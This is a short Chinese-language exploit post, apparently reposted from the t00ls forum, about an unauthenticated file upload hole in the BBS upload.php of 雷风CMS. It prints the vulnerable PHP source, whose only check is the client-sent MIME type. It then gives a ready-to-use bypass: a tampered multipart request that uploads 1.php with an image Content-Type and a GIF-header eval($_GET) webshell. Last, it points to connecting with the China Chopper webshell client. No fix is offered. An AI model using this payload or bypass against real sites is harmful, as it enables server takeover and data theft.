雷风cms默认是有一个bbs的, bbs根目录下默认是有一个upload.php
源码如下:

01 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "upload/2011/5/201105291829080676.gif) repeat-x;} 

14 </style> 

15 <body> 

16 <? 

17 if($_GET["action"]=="load"){ 

18     $uptypes = array('p_w_picpath/jpg','p_w_picpath/jpeg','p_w_picpath/png','p_w_picpath/pjpeg','p_w_picpath/gif','p_w_picpath/bmp','p_w_picpath/x-png'); 

19         $url     = "http://".$_SERVER["SERVER_NAME"]. $_SERVER["PHP_SELF"]; 

20         $url     = explode("/upload.php",$url); 

21         $url     = explode("/",$url[0]); 

22         $max_file_size = 2*(1024*1024); //上传文件大小限制, 单位BYTE 

23   

24         $root    = "upload_img"; 

25           

26         $folder  = date("Y-m",time()); 

27         $authnum = rand()%100000; 

28           

29         if ($_SERVER['REQUEST_METHOD'] == 'POST'){  

30             if (!is_uploaded_file($_FILES["file"][tmp_name])){ 

31                     exit("<script language=javascript>alert('Please select one file to upload(请选择上传文件)!');history.go(-1);</script>"); 

32                 } 

33                 $file = $_FILES["file"]; 

34                 if($max_file_size < $file["size"]){//检查文件大小 

35                     exit("<script language=javascript>alert('Max file size of $max_file_size bytes exceeded(文件大小不能超过2M)!');history.go(-1);</script>"); 

36                 } 

37                 if(!in_array($file["type"],$uptypes)){//检查文件类型 

38                     exit("<script language=javascript>alert('Type of the file must be \".jpg/.jpeg/.bmp/.gif/png\"(文件后缀只能是.jpg/.jpeg/.bmp/.gif/png)!');history.go(-1);</script>"); 

39                 } 

40             if(!@file_exists($root."/".$folder)) mkdir($root."/".$folder); 

41                   

42             $filename   = $file["tmp_name"]; 

43             $p_w_picpath_size = getp_w_picpathsize($filename); 

44             $pinfo      = pathinfo($file["name"]); 

45                 $ftype      = $pinfo['extension']; 

46                 $fileinfo   = $root."/".$folder."/".time().$authnum.".".$ftype; 

47                   

48                 if (file_exists($fileinfo) && $overwrite != true){  

49                     exit("<script language=javascript>alert('同名文件已经存在了!');history.go(-1);</script>"); 

50                 } 

51                 if(!move_uploaded_file ($filename,$fileinfo)){ 

52                    exit("<script language=javascript>alert('移动文件出错!');history.go(-1);</script>"); 

53                 } 

54             $pinfo=pathinfo($fileinfo); 

55             $fname=$pinfo[basename]; 

56                   

57                 $root = explode("../",$root); 

58                 $urlpath = ""; 

59                 for($i=0;$i<count($url)-count($root)+1;$i++){ 

60                         $urlpath .= $url[$i]."/"; 

61                 } 

62                 $urlpath .= $root[count($root)-1]."/"; 

63                   

64                 $picture  = $urlpath.$folder."/".$fname; 

65             $id = trim($_POST["id"]); 

66                 if(!$id) $id = "picture"; 

67                   

68                 echo "<script language='javascript'>\r\n"; 

69             echo "window.parent.document.getElementById('$id').value='$picture';\r\n"; 

70             echo "window.location.href='upload.php?id=$id';\r\n"; 

71             echo "</script>\r\n"; 

72         } 

73         exit; 

74 } 

75 ?> 

76 <form action="upload.php?action=load" method="post" enctype="multipart/form-data" name="upform" onSubmit="return checkform();"> 

77         <input name="file" type="file" class="input" id="iFile" size="18" /> 

78         <input name="Submit" type="submit" class="iButton" value="上 传" /> 

79         <input type="hidden" name="id" id="id" value="<?=$_GET["id"]?>"> 

80 </form> 

81 <script language="javascript"> 

82 function checkform(){ 

83     if(document.getElementById("file").value == ""){ 

84                 alert("Please select one file to upload(请选择上传文件)!"); 

85                 return false; 

86         } 

87 } 

88 </script> 

89 </body> 

90 </html>
很明显,无验证 过滤问题。
利用方法:
抓包
改包如下:
Content-Disposition: form-data; name="files"; filename="1.php"
Content-Type: p_w_picpath/jpeg

Gif89a<?
eval ($_GET[SB]);
?>


直接上菜刀就可以了

转自:t00ls